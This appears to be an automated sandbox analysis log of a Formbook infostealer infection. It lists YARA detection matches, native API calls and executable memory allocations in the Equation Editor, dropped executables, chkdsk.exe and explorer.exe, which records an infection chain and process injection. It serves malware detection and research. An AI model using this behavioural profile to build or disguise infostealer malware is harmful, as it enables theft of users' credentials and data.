          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 10_2_0203148910_2_02031489
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 10_2_0202351F10_2_0202351F
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 10_2_020C35DA10_2_020C35DA
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 10_2_020D3A8310_2_020D3A83
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 10_2_02047B0010_2_02047B00
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 10_2_020ADBDA10_2_020ADBDA
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 10_2_0201FBD710_2_0201FBD7
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 10_2_0209F8C410_2_0209F8C4
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 10_2_020BF8EE10_2_020BF8EE
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 10_2_020A394B10_2_020A394B
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 10_2_020A595510_2_020A5955
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 10_2_020ABF1410_2_020ABF14
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 10_2_0204DF7C10_2_0204DF7C
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 10_2_020BFDDD10_2_020BFDDD
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 10_2_000DC3A710_2_000DC3A7
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 10_2_000DE4C510_2_000DE4C5
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 10_2_000DEB0E10_2_000DEB0E
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 10_2_000C2D8910_2_000C2D89
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 10_2_000C2D9010_2_000C2D90
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 10_2_000C9E4D10_2_000C9E4D
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 10_2_000C9E5010_2_000C9E50
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 10_2_000C2FB010_2_000C2FB0
          Source: 2D86.tmp.0.drOLE stream indicators for Word, Excel, PowerPoint, and Visio: all false
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEMemory allocated: 770B0000 page execute and read and writeJump to behavior
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEMemory allocated: 771D0000 page execute and read and writeJump to behavior
          Source: C:\Users\user\AppData\Roaming\word.exeMemory allocated: 770B0000 page execute and read and writeJump to behavior
          Source: C:\Users\user\AppData\Roaming\word.exeMemory allocated: 771D0000 page execute and read and writeJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\oktuxvhtsq.exeMemory allocated: 770B0000 page execute and read and writeJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\oktuxvhtsq.exeMemory allocated: 771D0000 page execute and read and writeJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\oktuxvhtsq.exeMemory allocated: 770B0000 page execute and read and writeJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\oktuxvhtsq.exeMemory allocated: 771D0000 page execute and read and writeJump to behavior
          Source: C:\Windows\SysWOW64\chkdsk.exeMemory allocated: 770B0000 page execute and read and writeJump to behavior
          Source: C:\Windows\SysWOW64\chkdsk.exeMemory allocated: 771D0000 page execute and read and writeJump to behavior
          Source: sheet1.xml, type: SAMPLEMatched rule: INDICATOR_XML_LegacyDrawing_AutoLoad_Document author = ditekSHen, description = detects AutoLoad documents using LegacyDrawing
          Source: 7.2.oktuxvhtsq.exe.400000.2.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
          Source: 7.2.oktuxvhtsq.exe.400000.2.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 7.2.oktuxvhtsq.exe.400000.2.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 6.2.oktuxvhtsq.exe.260000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
          Source: 6.2.oktuxvhtsq.exe.260000.0.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 6.2.oktuxvhtsq.exe.260000.0.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 6.2.oktuxvhtsq.exe.260000.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
          Source: 6.2.oktuxvhtsq.exe.260000.0.raw.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 6.2.oktuxvhtsq.exe.260000.0.raw.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 7.2.oktuxvhtsq.exe.400000.2.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
          Source: 7.2.oktuxvhtsq.exe.400000.2.raw.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 7.2.oktuxvhtsq.exe.400000.2.raw.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000006.00000002.411942593.0000000000260000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
          Source: 00000006.00000002.411942593.0000000000260000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000006.00000002.411942593.0000000000260000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000007.00000002.420688853.0000000000430000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
          Source: 00000007.00000002.420688853.0000000000430000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000007.00000002.420688853.0000000000430000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000007.00000002.420683321.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
          Source: 00000007.00000002.420683321.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000007.00000002.420683321.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000007.00000002.420828073.0000000002280000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
          Source: 00000007.00000002.420828073.0000000002280000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000007.00000002.420828073.0000000002280000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 0000000A.00000002.849613102.0000000000320000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
          Source: 0000000A.00000002.849613102.0000000000320000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 0000000A.00000002.849613102.0000000000320000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 0000000A.00000002.849544062.00000000000C0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
          Source: 0000000A.00000002.849544062.00000000000C0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 0000000A.00000002.849544062.00000000000C0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 0000000A.00000002.849597547.00000000002F0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
          Source: 0000000A.00000002.849597547.00000000002F0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 0000000A.00000002.849597547.00000000002F0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: Process Memory Space: oktuxvhtsq.exe PID: 1784, type: MEMORYSTRMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
          Source: Process Memory Space: oktuxvhtsq.exe PID: 1516, type: MEMORYSTRMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
          Source: Process Memory Space: chkdsk.exe PID: 2052, type: MEMORYSTRMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
          Source: C:\Users\user\AppData\Roaming\word.exeCode function: 5_2_004030FB EntryPoint,SetErrorMode,GetVersion,lstrlenA,#17,OleInitialize,SHGetFileInfoA,GetCommandLineA,GetModuleHandleA,CharNextA,GetTempPathA,GetWindowsDirectoryA,lstrcatA,DeleteFileA,ExitProcess,OleUninitialize,ExitProcess,lstrcatA,lstrcatA,lstrcatA,lstrcmpiA,SetCurrentDirectoryA,DeleteFileA,CopyFileA,CloseHandle,GetCurrentProcess,ExitWindowsEx,ExitProcess,5_2_004030FB
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: String function: 0208F970 appears 84 times
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: String function: 0201DF5C appears 137 times
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: String function: 0206373B appears 253 times
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: String function: 02063F92 appears 132 times
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: String function: 0201E2A8 appears 60 times
          Source: C:\Users\user\AppData\Local\Temp\oktuxvhtsq.exeCode function: String function: 007AF970 appears 84 times
          Source: C:\Users\user\AppData\Local\Temp\oktuxvhtsq.exeCode function: String function: 0078373B appears 253 times
          Source: C:\Users\user\AppData\Local\Temp\oktuxvhtsq.exeCode function: String function: 0073E2A8 appears 60 times
          Source: C:\Users\user\AppData\Local\Temp\oktuxvhtsq.exeCode function: String function: 004102B0 appears 54 times
          Source: C:\Users\user\AppData\Local\Temp\oktuxvhtsq.exeCode function: String function: 00783F92 appears 132 times
          Source: C:\Users\user\AppData\Local\Temp\oktuxvhtsq.exeCode function: String function: 0073DF5C appears 137 times
          Source: C:\Users\user\AppData\Local\Temp\oktuxvhtsq.exeCode function: 7_2_0041A320 NtCreateFile,7_2_0041A320
          Source: C:\Users\user\AppData\Local\Temp\oktuxvhtsq.exeCode function: 7_2_0041A3D0 NtReadFile,7_2_0041A3D0
          Source: C:\Users\user\AppData\Local\Temp\oktuxvhtsq.exeCode function: 7_2_0041A450 NtClose,7_2_0041A450
          Source: C:\Users\user\AppData\Local\Temp\oktuxvhtsq.exeCode function: 7_2_0041A500 NtAllocateVirtualMemory,7_2_0041A500
          Source: C:\Users\user\AppData\Local\Temp\oktuxvhtsq.exeCode function: 7_2_0041A3CA NtReadFile,7_2_0041A3CA
          Source: C:\Users\user\AppData\Local\Temp\oktuxvhtsq.exeCode function: 7_2_0041A44B NtClose,7_2_0041A44B
          Source: C:\Users\user\AppData\Local\Temp\oktuxvhtsq.exeCode function: 7_2_00730078 NtResumeThread,LdrInitializeThunk,7_2_00730078
          Source: C:\Users\user\AppData\Local\Temp\oktuxvhtsq.exeCode function: 7_2_00730048 NtProtectVirtualMemory,LdrInitializeThunk,7_2_00730048
          Source: C:\Users\user\AppData\Local\Temp\oktuxvhtsq.exeCode function: 7_2_007300C4 NtCreateFile,LdrInitializeThunk,7_2_007300C4
          Source: C:\Users\user\AppData\Local\Temp\oktuxvhtsq.exeCode function: 7_2_0072F900 NtReadFile,LdrInitializeThunk,7_2_0072F900
          Source: C:\Users\user\AppData\Local\Temp\oktuxvhtsq.exeCode function: 7_2_0072F9F0 NtClose,LdrInitializeThunk,7_2_0072F9F0
          Source: C:\Users\user\AppData\Local\Temp\oktuxvhtsq.exeCode function: 7_2_0072FAE8 NtQueryInformationProcess,LdrInitializeThunk,7_2_0072FAE8
          Source: C:\Users\user\AppData\Local\Temp\oktuxvhtsq.exeCode function: 7_2_0072FAD0 NtAllocateVirtualMemory,LdrInitializeThunk,7_2_0072FAD0
          Source: C:\Users\user\AppData\Local\Temp\oktuxvhtsq.exeCode function: 7_2_0072FB68 NtFreeVirtualMemory,LdrInitializeThunk,7_2_0072FB68
          Source: C:\Users\user\AppData\Local\Temp\oktuxvhtsq.exeCode function: 7_2_0072FBB8 NtQueryInformationToken,LdrInitializeThunk,7_2_0072FBB8
          Source: C:\Users\user\AppData\Local\Temp\oktuxvhtsq.exeCode function: 7_2_0072FC60 NtMapViewOfSection,LdrInitializeThunk,7_2_0072FC60
          Source: C:\Users\user\AppData\Local\Temp\oktuxvhtsq.exeCode function: 7_2_0072FC90 NtUnmapViewOfSection,LdrInitializeThunk,7_2_0072FC90
          Source: C:\Users\user\AppData\Local\Temp\oktuxvhtsq.exeCode function: 7_2_0072FDC0 NtQuerySystemInformation,LdrInitializeThunk,7_2_0072FDC0
          Source: C:\Users\user\AppData\Local\Temp\oktuxvhtsq.exeCode function: 7_2_0072FD8C NtDelayExecution,LdrInitializeThunk,7_2_0072FD8C
          Source: C:\Users\user\AppData\Local\Temp\oktuxvhtsq.exeCode function: 7_2_0072FED0 NtAdjustPrivilegesToken,LdrInitializeThunk,7_2_0072FED0
          Source: C:\Users\user\AppData\Local\Temp\oktuxvhtsq.exeCode function: 7_2_0072FEA0 NtReadVirtualMemory,LdrInitializeThunk,7_2_0072FEA0
          Source: C:\Users\user\AppData\Local\Temp\oktuxvhtsq.exeCode function: 7_2_0072FFB4 NtCreateSection,LdrInitializeThunk,7_2_0072FFB4
          Source: C:\Users\user\AppData\Local\Temp\oktuxvhtsq.exeCode function: 7_2_00730060 NtQuerySection,7_2_00730060
          Source: C:\Users\user\AppData\Local\Temp\oktuxvhtsq.exeCode function: 7_2_0073010C NtOpenDirectoryObject,7_2_0073010C
          Source: C:\Users\user\AppData\Local\Temp\oktuxvhtsq.exeCode function: 7_2_007301D4 NtSetValueKey,7_2_007301D4
          Source: C:\Users\user\AppData\Local\Temp\oktuxvhtsq.exeCode function: 7_2_007307AC NtCreateMutant,7_2_007307AC
          Source: C:\Users\user\AppData\Local\Temp\oktuxvhtsq.exeCode function: 7_2_00730C40 NtGetContextThread,7_2_00730C40
          Source: C:\Users\user\AppData\Local\Temp\oktuxvhtsq.exeCode function: 7_2_007310D0 NtOpenProcessToken,7_2_007310D0
          Source: C:\Users\user\AppData\Local\Temp\oktuxvhtsq.exeCode function: 7_2_00731148 NtOpenThread,7_2_00731148
          Source: C:\Users\user\AppData\Local\Temp\oktuxvhtsq.exeCode function: 7_2_0072F8CC NtWaitForSingleObject,7_2_0072F8CC
          Source: C:\Users\user\AppData\Local\Temp\oktuxvhtsq.exeCode function: 7_2_00731930 NtSetContextThread,7_2_00731930
          Source: C:\Users\user\AppData\Local\Temp\oktuxvhtsq.exeCode function: 7_2_0072F938 NtWriteFile,7_2_0072F938
          Source: C:\Users\user\AppData\Local\Temp\oktuxvhtsq.exeCode function: 7_2_0072FA50 NtEnumerateValueKey,7_2_0072FA50
          Source: C:\Users\user\AppData\Local\Temp\oktuxvhtsq.exeCode function: 7_2_0072FA20 NtQueryInformationFile,7_2_0072FA20
          Source: C:\Users\user\AppData\Local\Temp\oktuxvhtsq.exeCode function: 7_2_0072FAB8 NtQueryValueKey,7_2_0072FAB8
          Source: C:\Users\user\AppData\Local\Temp\oktuxvhtsq.exeCode function: 7_2_0072FB50 NtCreateKey,7_2_0072FB50
          Source: C:\Users\user\AppData\Local\Temp\oktuxvhtsq.exeCode function: 7_2_0072FBE8 NtQueryVirtualMemory,7_2_0072FBE8
          Source: C:\Users\user\AppData\Local\Temp\oktuxvhtsq.exeCode function: 7_2_0072FC48 NtSetInformationFile,7_2_0072FC48
          Source: C:\Users\user\AppData\Local\Temp\oktuxvhtsq.exeCode function: 7_2_0072FC30 NtOpenProcess,7_2_0072FC30
          Source: C:\Users\user\AppData\Local\Temp\oktuxvhtsq.exeCode function: 7_2_0072FD5C NtEnumerateKey,7_2_0072FD5C
          Source: C:\Users\user\AppData\Local\Temp\oktuxvhtsq.exeCode function: 7_2_00731D80 NtSuspendThread,7_2_00731D80
          Source: C:\Users\user\AppData\Local\Temp\oktuxvhtsq.exeCode function: 7_2_0072FE24 NtWriteVirtualMemory,7_2_0072FE24
          Source: C:\Users\user\AppData\Local\Temp\oktuxvhtsq.exeCode function: 7_2_0072FF34 NtQueueApcThread,7_2_0072FF34
          Source: C:\Users\user\AppData\Local\Temp\oktuxvhtsq.exeCode function: 7_2_0072FFFC NtCreateProcessEx,7_2_0072FFFC
          Source: C:\Windows\explorer.exeCode function: 8_2_08080E12 NtProtectVirtualMemory,8_2_08080E12
          Source: C:\Windows\explorer.exeCode function: 8_2_0807F232 NtCreateFile,8_2_0807F232
          Source: C:\Windows\explorer.exeCode function: 8_2_08080E0A NtProtectVirtualMemory,8_2_08080E0A
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 10_2_020100C4 NtCreateFile,LdrInitializeThunk,10_2_020100C4
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 10_2_020107AC NtCreateMutant,LdrInitializeThunk,10_2_020107AC
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 10_2_0200FAB8 NtQueryValueKey,LdrInitializeThunk,10_2_0200FAB8
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 10_2_0200FAD0 NtAllocateVirtualMemory,LdrInitializeThunk,10_2_0200FAD0
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 10_2_0200FAE8 NtQueryInformationProcess,LdrInitializeThunk,10_2_0200FAE8
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 10_2_0200FB50 NtCreateKey,LdrInitializeThunk,10_2_0200FB50
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 10_2_0200FB68 NtFreeVirtualMemory,LdrInitializeThunk,10_2_0200FB68
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 10_2_0200FBB8 NtQueryInformationToken,LdrInitializeThunk,10_2_0200FBB8
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 10_2_0200F900 NtReadFile,LdrInitializeThunk,10_2_0200F900
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 10_2_0200F9F0 NtClose,LdrInitializeThunk,10_2_0200F9F0
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 10_2_0200FED0 NtAdjustPrivilegesToken,LdrInitializeThunk,10_2_0200FED0
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 10_2_0200FFB4 NtCreateSection,LdrInitializeThunk,10_2_0200FFB4
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 10_2_0200FC60 NtMapViewOfSection,LdrInitializeThunk,10_2_0200FC60
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 10_2_0200FD8C NtDelayExecution,LdrInitializeThunk,10_2_0200FD8C
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 10_2_0200FDC0 NtQuerySystemInformation,LdrInitializeThunk,10_2_0200FDC0
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 10_2_02010048 NtProtectVirtualMemory,10_2_02010048
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 10_2_02010060 NtQuerySection,10_2_02010060
